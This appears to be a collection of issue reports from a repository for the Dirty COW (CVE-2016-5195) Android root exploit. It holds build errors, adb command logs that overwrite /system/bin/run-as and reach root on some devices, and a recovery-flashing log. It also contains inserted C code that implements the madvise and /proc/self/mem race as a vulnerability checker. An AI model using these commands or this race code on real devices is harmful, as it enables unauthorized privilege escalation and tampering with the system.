No matter what package I use, whether existent or not, always prints the above error message. I've tried run-as id, run-as ls -1Z /sbin/, run-as run-as, run-as dfbkdfvksfdigertgf, and more. All the same error message.

run-as: Package 'id' is unknown
run-as: Package 'ls' is unknown
run-as: Package 'run-as' is unknown
run-as: Package 'dfbkdfvksfdigertgf' is unknown

etc. I'd love if someone could help. Thanks!

Segmentation fault

I tried compiling in all the ways from the other issue, but every compiled binary gives me a segmentation fault. I'm trying to use it on my Android 3.2.1 (API 13) tablet that never got root. Can anyone tell me what to do?

error make

hi.. for a long time I've been trying to figure out how to run this exploit, but as soon as I run make run it tells me:
No rules to generate the "run" target. Arrest.

then after that I tried to just run make and it says:
ndk-build NDK_PROJECT_PATH =. APP_BUILD_SCRIPT =. / Android.mk APP_PLATFORM = android-21
make: ndk-build: command not found
makefile: 5: instruction set for the "build" target fails
make: *** [build] Error 127

am I doing something wrong?

Not working on android nougat

Hi i try to execute the make root command and i get the following output:

ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16
make[1]: Entering directory `/home/matant/Downloads/tmp/CVE-2016-5195'
[armeabi] Compile thumb : dirtycow <= dirtycow.c
[armeabi] Compile thumb : dirtycow <= dcow.c
[armeabi] Executable : dirtycow
[armeabi] Install : dirtycow => libs/armeabi/dirtycow
[armeabi] Compile thumb : run-as <= dirtycow.c
[armeabi] Compile thumb : run-as <= run-as.c
[armeabi] Executable : run-as
[armeabi] Install : run-as => libs/armeabi/run-as
make[1]: Leaving directory `/home/matant/Downloads/tmp/CVE-2016-5195'
adb push libs/armeabi/dirtycow /data/local/tmp/dcow
191 KB/s (13516 bytes in 0.069s)
adb push libs/armeabi/run-as /data/local/tmp/run-as
93 KB/s (5276 bytes in 0.055s)
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (5276) and destination file size (14360) differ

[*] size 5276
[*] mmap 0xe8960000
[*] currently 0xe8960000=464c457f
[*] madvise = 0xe8960000 5276
[*] madvise = 0 1048576
[*] /proc/self/mem -269922 269922
[*] exploited 0xe8960000=464c457f
adb shell /system/bin/run-as
run-as: Usage:
run-as [--user ] []

SEAndroid on some of the issues

It seems only the root authority is strictly controlled; other users have normal authority. I have constructed a su executable file in the local directory; executing run-as and then using su to raise the permissions to system actually gives all the system permissions. With system authority, can the authority be further enhanced?
a

Android 7.1.1 run error

angler:/data/local/tmp $ ./dirtycow
"./dirtycow": error: only position independent executables (PIE) are supported.
Aborted

Doesn't seem to work on the MIPS platform: library not found error

MIPS-based smartwatch, probably Android 5.1, no SELinux.

make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16
make[1]: Entering directory '/home/michael/Technisches/CVE-2016-5195'
[arm64-v8a] Install : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install : run-as => libs/arm64-v8a/run-as
[x86_64] Install : dirtycow => libs/x86_64/dirtycow
[x86_64] Install : run-as => libs/x86_64/run-as
[mips64] Install : dirtycow => libs/mips64/dirtycow
[mips64] Install : run-as => libs/mips64/run-as
[armeabi-v7a] Install : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install : run-as => libs/armeabi-v7a/run-as
[armeabi] Install : dirtycow => libs/armeabi/dirtycow
[armeabi] Install : run-as => libs/armeabi/run-as
[x86] Install : dirtycow => libs/x86/dirtycow
[x86] Install : run-as => libs/x86/run-as
[mips] Install : dirtycow => libs/mips/dirtycow
[mips] Install : run-as => libs/mips/run-as
make[1]: Leaving directory '/home/michael/Technisches/CVE-2016-5195'
adb push libs/mips/dirtycow /data/local/tmp/dcow
3025 KB/s (71272 bytes in 0.023s)
adb push libs/mips/run-as /data/local/tmp/run-as
4716 KB/s (71348 bytes in 0.014s)
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6ffffffe arg 0x7ec
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6fffffff arg 0x1
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (71348) and destination file size (70948) differ

corruption?

[*] size 71348
[*] mmap 0x779af000
[*] currently 0x779af000=464c457f
[*] madvise = 0x779af000 71348
[*] /proc/self/mem 65069376 912
[*] madvise = 0 160505
[*] exploited 0x779af000=464c457f
adb shell /system/bin/run-as
WARNING: linker: /system/bin/run-as: unused DT entry: type 0xdf000e0a arg 0xd5d6d7de
WARNING: linker: /system/bin/run-as: unused DT entry: type 0xd1d2d3d4 arg 0xbd0
WARNING: linker: /system/bin/run-as: unused DT entry: type 0xffffffff arg 0x0
WARNING: linker: /system/bin/run-as: unused DT entry: type 0xffffffff arg 0x0
WARNING: linker: /system/bin/run-as: unused DT entry: type 0xffffffff arg 0x0
CANNOT LINK EXECUTABLE DEPENDENCIES: library "�" not found
Any idea?

Could not set capabilities: Operation not permitted

user@host ~/CVE-2016-5195-master $ adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
running as uid 2000
Could not set capabilities: Operation not permitted
setresgid/setresuid failed
uid 2000

user@host ~/CVE-2016-5195-master $ 

Exploit hangs, no SELinux errors

Sup!

I was testing the exploit with an LG G5 and a G4 and the shell was hanging, but I wasn't getting any SELinux errors with adb logcat | grep avc, so I was trying some things and found out that if you change the Makefile from

    adb shell /system/bin/run-as

to

    adb shell

and call /system/bin/run-as manually, you get root.

demo:

~/S/CVE-2016-5195> make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=arm64-v8a APP_PLATFORM=android-23
make[1]: Entering directory '/home/svieg/Shared/CVE-2016-5195'
[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
make[1]: Leaving directory '/home/svieg/Shared/CVE-2016-5195'
adb push libs/arm64-v8a/dirtycow /data/local/tmp/dcow
198 KB/s (10056 bytes in 0.049s)
adb push libs/arm64-v8a/run-as /data/local/tmp/run-as
220 KB/s (10056 bytes in 0.044s)
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (10056) and destination file size (14192) differ

[*] size 10056
[*] mmap 0x7fa684e000
[*] currently 0x7fa684e000=10102464c457f
[*] madvise = 0x7fa684e000 10056
[*] madvise = 0 31
[*] /proc/self/mem 30168 3
[*] exploited 0x7fa684e000=10102464c457f
adb shell
shell@h1:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:shell:s0
shell@h1:/ $ /system/bin/run                                                   
run-as runcon 
shell@h1:/ $ /system/bin/run-as                                                
uid /system/bin/run-as 2000
uid 0
0 u:r:runas:s0
context 0 u:r:shell:s0
shell@h1:/ # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:shell:s0
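The `[*] madvise` and `[*] /proc/self/mem` lines in the output above are the two threads of the Dirty COW race: one keeps discarding the private copy of a read-only, MAP_PRIVATE page with madvise(MADV_DONTNEED), the other keeps writing through that mapping via /proc/self/mem, and on an unpatched kernel the write occasionally lands on the shared page-cache page. What follows is an added example and not code from this repository or from the post above: a self-contained C checker that runs that race against a throwaway file the program creates itself in /tmp, then re-reads the file to see whether the page cache changed. The round count, the payload string and the function names are my own choices.

```c
#define _GNU_SOURCE
#define _FILE_OFFSET_BITS 64
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/stat.h>

#define RACE_ROUNDS 200000   /* bounded so the checker always terminates (my choice) */

struct race {
    void *map;               /* PROT_READ, MAP_PRIVATE mapping of the target file */
    size_t map_len;
    int mem_fd;              /* /proc/self/mem opened O_RDWR */
    const char *payload;
    size_t payload_len;
};

/* Half 1 ("[*] madvise"): keep dropping the private copy so the next write
 * fault has to resolve the page again. */
static void *madvise_loop(void *arg)
{
    struct race *r = arg;
    for (int i = 0; i < RACE_ROUNDS; i++)
        madvise(r->map, r->map_len, MADV_DONTNEED);
    return NULL;
}

/* Half 2 ("[*] /proc/self/mem"): write through the read-only mapping via
 * /proc/self/mem (FOLL_FORCE). On a vulnerable kernel the write can hit the
 * shared page-cache page instead of a private COW copy. */
static void *write_loop(void *arg)
{
    struct race *r = arg;
    for (int i = 0; i < RACE_ROUNDS; i++)
        if (pwrite(r->mem_fd, r->payload, r->payload_len, (off_t)(uintptr_t)r->map) < 0)
            break;           /* e.g. a sandbox that refuses /proc/self/mem writes */
    return NULL;
}

/* Race `payload` against the start of `path`, then re-read the file.
 * Returns 1 if the page cache now begins with `payload` (vulnerable),
 * 0 if the file is unchanged (patched), -1 on a setup error. */
int dirtycow_check(const char *path, const char *payload)
{
    struct race r = { .payload = payload, .payload_len = strlen(payload) };
    struct stat st;
    char buf[256];
    pthread_t t_madv, t_write;
    int fd, verdict = -1;

    if (r.payload_len == 0 || r.payload_len > sizeof buf || (fd = open(path, O_RDONLY)) < 0)
        return -1;
    if (fstat(fd, &st) < 0 || (size_t)st.st_size < r.payload_len) { close(fd); return -1; }
    r.map_len = (size_t)st.st_size;
    r.map = mmap(NULL, r.map_len, PROT_READ, MAP_PRIVATE, fd, 0);
    close(fd);
    if (r.map == MAP_FAILED)
        return -1;
    if ((r.mem_fd = open("/proc/self/mem", O_RDWR)) < 0)
        goto out_unmap;
    if (pthread_create(&t_madv, NULL, madvise_loop, &r) != 0)
        goto out_close;
    if (pthread_create(&t_write, NULL, write_loop, &r) != 0) {
        pthread_join(t_madv, NULL);
        goto out_close;
    }
    pthread_join(t_madv, NULL);
    pthread_join(t_write, NULL);

    /* Verdict from a fresh read(), i.e. the page cache, not from our mapping:
     * on a patched kernel the write only ever reached a private COW copy. */
    if ((fd = open(path, O_RDONLY)) >= 0) {
        ssize_t n = read(fd, buf, sizeof buf);
        close(fd);
        if (n >= 0 && (size_t)n >= r.payload_len)
            verdict = memcmp(buf, payload, r.payload_len) == 0 ? 1 : 0;
    }
out_close:
    close(r.mem_fd);
out_unmap:
    munmap(r.map, r.map_len);
    return verdict;
}

/* Constructed target: a throwaway /tmp file with known content, so the race
 * never touches a real system binary. Contents and payload are my choice. */
int dirtycow_self_test(void)
{
    char path[] = "/tmp/dcow-check-XXXXXX";
    static const char original[] = "ORIGINAL PAGE-CACHE CONTENT, MUST NOT CHANGE\n";
    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    ssize_t w = write(fd, original, sizeof original - 1);
    close(fd);
    int verdict = w == (ssize_t)(sizeof original - 1) ? dirtycow_check(path, "DIRTYCOW WAS HERE") : -1;
    unlink(path);
    return verdict;
}

int main(void)
{
    int v = dirtycow_self_test();
    printf("%s\n", v < 0 ? "check failed" : v ? "VULNERABLE: page cache changed" : "not vulnerable");
    return v < 0 ? 2 : v;
}
```

Build with `cc -pthread dcow_check.c -o dcow_check` and run it as an unprivileged user: exit status 1 means the write reached the page cache (the kernel is vulnerable), 0 means the file re-read unchanged, 2 means the check could not be set up (no /proc/self/mem, unwritable /tmp). The verdict deliberately comes from a fresh read() of the file rather than from the mapping, because on a patched kernel the write succeeds too, it just lands in a private COW copy that nobody else can see. Raise RACE_ROUNDS if you want a longer race on a slow device; the PoC's threads loop far longer than this.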

How can I use it?

First of all, thank you for the privilege escalation exploit! Could you please tell me how I can use it?
I'm a beginner; can anybody guide me through it? Some say that some lines of code are missing for it to work properly. Is that true?

LGH91810j - WETA ROM, lost root + TWRP. run-as operation not permitted

Stuck in an unrooted non-stock ROM. OEM unlocked. USB debugging ON. getenforce permissive. Full log. Everything works up until run-as. Offering $50 to whoever can help fix this. Full log of the adb commands:

C:\Users\darkseid\Desktop\LG_stuff>adb push dirtycow /data/local/tmp
dirtycow: 1 file pushed. 0.2 MB/s (9984 bytes in 0.042s)

C:\Users\darkseid\Desktop\LG_stuff>adb push recowvery-applypatch /data/local/tmp
recowvery-applypatch: 1 file pushed. 1.7 MB/s (18472 bytes in 0.011s)

C:\Users\darkseid\Desktop\LG_stuff>adb push recowvery-app_process64 /data/local/tmp
recowvery-app_process64: 1 file pushed. 1.0 MB/s (10200 bytes in 0.009s)

C:\Users\darkseid\Desktop\LG_stuff>adb push recowvery-run-as /data/local/tmp
recowvery-run-as: 1 file pushed. 0.9 MB/s (10192 bytes in 0.011s)

C:\Users\darkseid\Desktop\LG_stuff>adb shell
elsa:/ $ cd /data/local/tmp
elsa:/data/local/tmp $ ls
dirtycow recowvery-app_process64 recowvery-applypatch recowvery-run-as
elsa:/data/local/tmp $ chmod 0777 *
elsa:/data/local/tmp $ ./dirtycow /system/bin/applypatch recowvery-applypatch
warning: new file size (18472) and file old size (165144) differ

size 165144

[*] mmap 0x79eac35000
[*] exploit (patch)
[*] currently 0x79eac35000=10102464c457f
[*] madvise = 0x79eac35000 165144
[*] madvise = 0 1048576
[*] /proc/self/mem 1367343104 1048576
[*] exploited 0x79eac35000=10102464c457f
elsa:/data/local/tmp $ ./dirtycow /system/bin/app_process64 recowvery-app_process64
warning: new file size (10200) and file old size (18600) differ

size 18600

[*] mmap 0x7280bda000
[*] exploit (patch)
[*] currently 0x7280bda000=10102464c457f
[*] madvise = 0x7280bda000 18600
[*] madvise = 0 1048576
[*] /proc/self/mem -1971322880 1048576
[*] exploited 0x7280bda000=10102464c457f
elsa:/data/local/tmp $ exit

C:\Users\darkseid\Desktop\LG_stuff>adb logcat -s recowvery
--------- beginning of system
--------- beginning of main
--------- beginning of crash
01-21 19:34:18.696 7457 7457 I recowvery: Welcome to recowvery! (app_process64)
01-21 19:34:18.696 7457 7457 I recowvery: ------------
01-21 19:34:18.697 7457 7457 I recowvery: Current selinux context: u:r:zygote:s0
01-21 19:34:18.697 7457 7457 I recowvery: Set context to 'u:r:system_server:s0'
01-21 19:34:18.698 7457 7457 I recowvery: Current security context: u:r:system_server:s0
01-21 19:34:18.698 7457 7457 I recowvery: Setting property 'ctl.start' to 'flash_recovery'
01-21 19:34:18.708 7457 7457 I recowvery: ------------
01-21 19:34:18.708 7457 7457 I recowvery: Recovery flash script should have started!
01-21 19:34:18.708 7457 7457 I recowvery: Run on your PC or device to see progress: adb logcat -s recowvery
01-21 19:34:18.708 7457 7457 I recowvery: Waiting 120 seconds...
01-21 19:34:18.756 7461 7461 I recowvery: Welcome to recowvery! (applypatch)
01-21 19:34:18.757 7461 7461 I recowvery: ------------
01-21 19:34:18.757 7461 7461 I recowvery: Loading boot image from block device '/dev/block/bootdevice/by-name/boot'...
01-21 19:34:18.871 7461 7461 I recowvery: Loaded boot image!
01-21 19:34:18.871 7461 7461 I recowvery: ------------
01-21 19:34:18.871 7461 7461 I recowvery: Saving old ramdisk to file
01-21 19:34:18.892 7461 7461 I recowvery: Writing to file '/cache/ramdisk.gz'...
01-21 19:34:18.930 7461 7461 I recowvery: Wrote OK: 7100944 bytes
01-21 19:34:18.930 7461 7461 I recowvery: Decompressing ramdisk (gzip -d)
01-21 19:34:19.357 7461 7461 I recowvery: Checking '/cache/ramdisk.cpio' for validity (size >= 4194304 bytes)
01-21 19:34:19.357 7461 7461 I recowvery: '/cache/ramdisk.cpio': 18494316 bytes
01-21 19:34:19.357 7461 7461 I recowvery: File OK
01-21 19:34:19.357 7461 7461 I recowvery: Decompression of ramdisk successful
01-21 19:34:19.357 7461 7461 I recowvery: Deleting '/cache/ramdisk.gz' (no longer needed)
01-21 19:34:19.363 7461 7461 I recowvery: ------------
01-21 19:34:19.363 7461 7461 I recowvery: Opened cpio archive '/cache/ramdisk.cpio' (18494316 bytes)
01-21 19:34:19.363 7461 7461 I recowvery: Wrote new file (308 bytes) to cpio archive,
01-21 19:34:19.363 7461 7461 I recowvery: Final size: 18494624 bytes
01-21 19:34:19.363 7461 7461 I recowvery: ------------
01-21 19:34:19.363 7461 7461 I recowvery: Compressing cpio to ramdisk (gzip -9 -c)
01-21 19:34:25.911 7461 7461 I recowvery: Checking '/cache/ramdisk.gz' for validity (size >= 2097152 bytes)
01-21 19:34:25.912 7461 7461 I recowvery: '/cache/ramdisk.gz': 7079535 bytes
01-21 19:34:25.912 7461 7461 I recowvery: File OK
01-21 19:34:25.912 7461 7461 I recowvery: Compression of ramdisk successful
01-21 19:34:25.912 7461 7461 I recowvery: Deleting '/cache/ramdisk.cpio' (no longer needed)
01-21 19:34:25.930 7461 7461 I recowvery: Loading new ramdisk into boot image
01-21 19:34:25.942 7461 7461 I recowvery: ------------
01-21 19:34:25.942 7461 7461 I recowvery: cmdline: "console=ttyHSL0,115200,n8 androidboot.console=ttyHSL0 user_debug=31 ehci-hcd.park=3 lpm_levels.sleep_disabled=1 cma=32M@0-0xffffffff androidboot.hardware=elsa androidboot.selinux=permissive enforcing=0"
01-21 19:34:25.942 7461 7461 I recowvery: Setting permissive arguments on cmdline
01-21 19:34:25.942 7461 7461 I recowvery: cmdline: "console=ttyHSL0,115200,n8 androidboot.console=ttyHSL0 user_debug=31 ehci-hcd.park=3 lpm_levels.sleep_disabled=1 cma=32M@0-0xffffffff androidboot.hardware=elsa androidboot.selinux=permissive enforcing=0"
01-21 19:34:25.942 7461 7461 I recowvery: ------------
01-21 19:34:25.942 7461 7461 I recowvery: Updating boot image hash
01-21 19:34:26.363 7461 7461 I recowvery: Writing modified boot image to block device '/dev/block/bootdevice/by-name/recovery'...
01-21 19:34:26.581 7461 7461 I recowvery: Done!
01-21 19:34:26.581 7461 7461 I recowvery: ------------
01-21 19:34:26.581 7461 7461 I recowvery: Permissive boot has been has been flashed to /dev/block/bootdevice/by-name/recovery successfully!
01-21 19:34:26.581 7461 7461 I recowvery: You may use 'reboot recovery' now to enter a permissive system.
01-21 19:34:26.581 7461 7461 I recowvery: ***********************************************
01-21 19:34:26.581 7461 7461 I recowvery: * give jcadduono a hug, will ya? *
01-21 19:34:26.581 7461 7461 I recowvery: ***********************************************
^C
C:\Users\darkseid\Desktop\LG_stuff>adb shell reboot recovery

C:\Users\darkseid\Desktop\LG_stuff>adb shell
elsa:/ $ getenforce
Permissive
elsa:/ $ cd /data/local/tmp
elsa:/data/local/tmp $ ./dirtycow /system/bin/run-as recowvery-run-as
warning: new file size (10192) and file old size (14360) differ

size 14360

[*] mmap 0x7864c47000
[*] exploit (patch)
[*] currently 0x7864c47000=10102464c457f
[*] madvise = 0x7864c47000 14360
[*] madvise = 0 1048576
[*] /proc/self/mem -2122317824 1048576
[*] exploited 0x7864c47000=10102464c457f
elsa:/data/local/tmp $ run-as exec ./recowvery-applypatch boot
Welcome to recowvery! (run-as)

Current uid: 2000
Setting capabilities
Could not set capabilities
Error 1: Operation not permitted

Compiling issue on android-16

I am trying to compile the PoC for android-16 (Android 4.1.2). In theory DirtyCow should work, because it's Linux kernel 3.0.31. But it's not building :(

I modified the Makefile:
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16

Unfortunately, it fails with several errors:

$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16
...
[armeabi-v7a] Compile thumb  : run-as <= run-as.c
In file included from ./run-as.c:3:
In file included from /usr/include/sys/capability.h:30:
/usr/include/sys/xattr.h:41:2: error: expected function body after function
      declarator
        __THROW;
        ^
/usr/include/sys/xattr.h:48:2: error: expected function body after function
      declarator
        __THROW;
        ^
/usr/include/sys/xattr.h:53:37: error: expected function body after function
      declarator
                      size_t __size, int __flags) __THROW;
                                                  ^

Any idea?
Thanks!

Great work!

I want to know what can be changed to get root access in order to patch, unlock and root an Android 6.0 device.

setresgid/setresuid failed

Next phone: Huawei P8

Output:

MBP-Krzysztof:CVE-2016-5195 krzysiek$ adb shell /system/bin/run-as
uid /system/bin/run-as 2000
setresgid/setresuid failed
uid 2000
0 u:r:runas:s0
context 0 u:r:shell:s0
shell@hwALE-H:/ $ whoami
whoami
shell
shell@hwALE-H:/ $ id
id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:shell:s0

Exploit not working

Hello, I've been trying to get this to work and am running into the following. It looks like it's not properly swapping out the run-as command, despite saying "exploited".

$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-21
[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
[x86_64] Install        : dirtycow => libs/x86_64/dirtycow
[x86_64] Install        : run-as => libs/x86_64/run-as
[mips64] Install        : dirtycow => libs/mips64/dirtycow
[mips64] Install        : run-as => libs/mips64/run-as
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
[armeabi] Install        : dirtycow => libs/armeabi/dirtycow
[armeabi] Install        : run-as => libs/armeabi/run-as
[x86] Install        : dirtycow => libs/x86/dirtycow
[x86] Install        : run-as => libs/x86/run-as
[mips] Install        : dirtycow => libs/mips/dirtycow
[mips] Install        : run-as => libs/mips/run-as
adb push libs/armeabi/dirtycow /data/local/tmp/dirtycow
[100%] /data/local/tmp/dirtycow
adb push libs/armeabi/run-as /data/local/tmp/run-as
[100%] /data/local/tmp/run-as
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
warning: new file size (13776) and file old size (14192) differ

size 14192


[*] mmap 0xf70b1000
[*] exploit (patch)
[*] currently 0xf70b1000=464c457f
[*] madvise = 0xf70b1000 14192
[*] madvise = 0 1048576
[*] /proc/self/mem -1048576 1048576
[*] exploited 0xf70b1000=464c457f
adb shell /system/bin/run-as
run-as: Usage:
    run-as <package-name> [--user <uid>] <command> [<args>]

How do I remove the run-as from /system/bin?

I tested to see if my phone is vulnerable, and now, what is the procedure to remove it from there?

Will the presence of it there result in problems with OTA updates?

Best regards,
Claudemir
